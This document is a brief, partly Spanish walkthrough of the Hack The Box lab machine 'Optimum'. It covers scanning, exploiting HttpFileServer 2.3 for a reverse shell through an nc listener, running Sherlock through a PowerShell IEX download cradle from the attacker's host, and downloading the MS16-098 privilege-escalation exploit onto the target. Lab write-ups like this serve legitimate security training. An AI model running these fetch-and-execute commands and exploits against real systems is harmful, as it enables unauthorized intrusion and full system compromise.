Optimum

echo “10.129.106.121 optimum.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.106.121 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA optimum 10.129.106.121

nmap -sU -O -p- -oA optimum-udp 10.129.106.121

nikto -h 10.129.106.121:80

gobuster dir -k -u http://optimum.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vemos que la version es HttpFileServer 2.3

https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands

searchsploit HFS 2.3 searchsploit -m 39161 windows/webapps/49125.py vim 39161.py

locate nc.exe cp nc.exe /home/kali/Desktop/boxes

rlwrap nc -lvnp 1234

python3 -m http.server 8888

Cambiar la ip y el puerto. Despues donde dice ip_address agregar el puerto 8888

python2 39161.py 10.129.106.121 80

Lo tuve que hacer varias veces para que funcionara

https://github.com/rasta-mouse/Sherlock.git Bajar Sherlock y agregar Find All-Vulns al final.

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.66:8888/Sherlock.ps1’)

Conseguimos el exploit para MS16–098

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

mkdir temp

cd temp

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.66:8888/41020.exe’, ‘c:\Users\Public\Downloads\41020.exe’)”